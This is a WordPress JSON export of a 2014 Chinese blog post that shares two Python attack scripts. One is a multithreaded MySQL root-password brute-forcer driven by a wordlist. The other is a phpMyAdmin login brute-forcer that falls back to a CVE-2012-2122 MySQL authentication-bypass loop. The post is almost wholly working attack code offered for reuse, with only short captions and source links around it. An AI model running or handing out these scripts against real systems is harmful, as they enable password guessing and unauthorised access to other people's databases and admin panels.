{"id":494,"date":"2014-07-08T15:19:05","date_gmt":"2014-07-08T15:19:05","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=494"},"modified":"2014-07-08T15:19:05","modified_gmt":"2014-07-08T15:19:05","slug":"mysql%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e7%9a%84%e5%a4%9a%e7%ba%bf%e7%a8%8bpython%e8%84%9a%e6%9c%acbak","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/494.html","title":{"rendered":"\u66b4\u529b\u7834\u89e3\u7684[\u591a\u7ebf\u7a0b]Python\u811a\u672c[bak]"},"content":{"rendered":"
\u7528Python\u5b9e\u73b0\u7684\u591a\u7ebf\u7a0bMySQL\u66b4\u529b\u7834\u89e3\u811a\u672c\uff1a<\/h6>\n
#!\/usr\/bin\/env python\n#coding=utf-8\nimport Queue\nfrom threading import Thread\nimport sys\nimport MySQLdb\nimport time\n\nclass End():\n\tdef __init__(self):\n\t\tself.end = False\n\tdef Finish(self):\n\t\tself.end = True\n\tdef GetEnd(self):\n\t\treturn self.end\n\nclass Connection(Thread):\n\tdef __init__(self, queue, TheEnd):\n\t\tThread.__init__(self)\n\t\tself.queue = queue\n\t\tself.TheEnd = TheEnd\n\n\tdef run(self):\n\t\twhile (not self.TheEnd.GetEnd()) and (not self.queue.empty()):\n\t\t\tpwd = self.queue.get()\n\t\t\ttry:\n\t\t\t\tdbConn = MySQLdb.Connect(user = 'root', passwd = pwd, host = \"127.0.0.1\", db = 'mysql')\n\t\t\texcept:\n\t\t\t\tprint \"[+]root:\" + pwd + \" Connect wrong..\"\n\t\t\t\tcontinue\n\t\t\tprint \"[+]root:\" + pwd + \" Connect success..\"\n\t\t\tself.TheEnd.Finish()\n\ndef main():\n\tqueue=Queue.Queue()\n\tTheEnd = End()\n\tpwds = [line.rstrip() for line in open(\"pass.txt\")]\n\tfor pwd in pwds:\n\t\tqueue.put(pwd)\n\tinitsize = queue.qsize()\n\ttested = 0\n\tthreads = 8    #\u4fee\u6539\u7ebf\u7a0b\u5904\n\tfor i in range(0, int(threads)):\n\t\tConnection(queue, TheEnd).start()\n\twhile (not TheEnd.GetEnd()) and (not queue.empty()):\n\t\ttime.sleep(2)\n\t\tactsize = queue.qsize()\n\t\ttested = initsize - actsize\n\t\tprint 'use %i password | Remaining %i password ' %(tested, actsize)\n\nif __name__ == '__main__':\n\tmain()<\/pre>\n
\u53c2\u8003\u94fe\u63a5<\/strong><\/span>\uff1apython\u66b4\u529b\u7834\u89e3mysql\u5bc6\u7801<\/span><\/a><\/p>\n
Python\u7248PHPMyAdmin\u66b4\u529b\u7834\u89e3<\/h6>\n
#!\/usr\/bin\/env python\n# coding=utf-8\nimport urllib\nimport urllib2\nimport cookielib\nimport sys\nimport subprocess\n'''\nPHPMyAdmin\u66b4\u529b\u7834\u89e3\t\u52a0\u4e0aCVE-2012-2122 MySQL Authentication Bypass Vulnerability\u6f0f\u6d1e\u5229\u7528\n'''\n\ndef Crack(url, username, password):\n\topener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))\n\theaders = {'User-Agent' : 'Mozilla\/5.0 (Windows NT 6.1; WOW64)'}\n\tparams = urllib.urlencode({'pma_username': username, 'pma_password': password})\n\trequest = urllib2.Request(url+\"\/index.php\", params, headers)\n\tresponse = opener.open(request)\n\ta = response.read()\n\tif a.find('Database server')!=-1 and a.find('name=\"login_form\"')==-1:\n\t\treturn username, password\n\treturn 0\n\ndef MySQLAuthenticationBypassCheck(host, port):\n\ti=0\n\twhile i<300:\n\t\ti=i+1\n\t\tsubprocess.Popen(\"mysql --host=%s -P %s -uroot -piswin\" % (host, port), shell=True).wait()\n\nif __name__ == '__main__':\n\tif len(sys.argv)<4:\n\t\tprint \"#author:iswinn#useage python pma.py http:\/\/www.iswin.org\/phpmyadmin\/ username.txt password.txt\"\n\t\tsys.exit()\n\tprint \"Bruting, Pleas wait...\"\n\tfor name in open(sys.argv[2], \"r\"):\n\t\tfor passw in open(sys.argv[3], \"r\"):\n\t\t\tstate=Crack(sys.argv[1], name, passw)\n\t\t\tif state!=0:\n\t\t\t\tprint \"nLogin successful\"\n\t\t\t\tprint \"UserName: \"+state[0]+\"tPassWord: \"+state[1]\n\t\t\t\tsys.exit()\n\tprint \"Sorry, Brute failed..., try to use MySQLAuthenticationBypassCheck\"\n\tchoice = raw_input('Warning:This function needs mysql environment.nY:Try to MySQLAuthenticationBypassChecknOthers:Exitn')\n\tif choice=='Y' or choice=='y':\n\t\thost=raw_input('Host:')\n\t\tport=raw_input('Port:')\n\t\tMySQLAuthenticationBypassCheck(host, port)<\/pre>\n
\u8fd9\u4e2a\u662f\u5355\u7ebf\u7a0b\u7684phpmyadmin\u7684\u66b4\u529b\u7834\u89e3\u811a\u672c\uff0c\u7136\u540e\u52a0\u4e0a\u4e86\u4e2a\u201cCVE-2012-2122 MySQL Authentication Bypass Vulnerability\u6f0f\u6d1e\u5229\u7528\u201d\u7684\u68c0\u6d4b\u3002<\/p>\n
\u539f\u6587\u94fe\u63a5<\/strong><\/span>\uff1ahttp:\/\/www.iswin.org\/a\/18<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u7528Python\u5b9e\u73b0\u7684\u591a\u7ebf\u7a0bMySQL\u66b4\u529b\u7834\u89e3\u811a\u672c\uff1a #!\/usr\/bin\/env python #coding […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14,23,7,25,12],"tags":[16,8,200,124],"class_list":["post-494","post","type-post","status-publish","format-standard","hentry","category-database","category-knowledgebase-2","category-programing","category-security","category-tools","tag-mysql","tag-python","tag-queue","tag-thread"],"views":2435,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/494","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=494"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/494\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=494"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=494"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=494"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}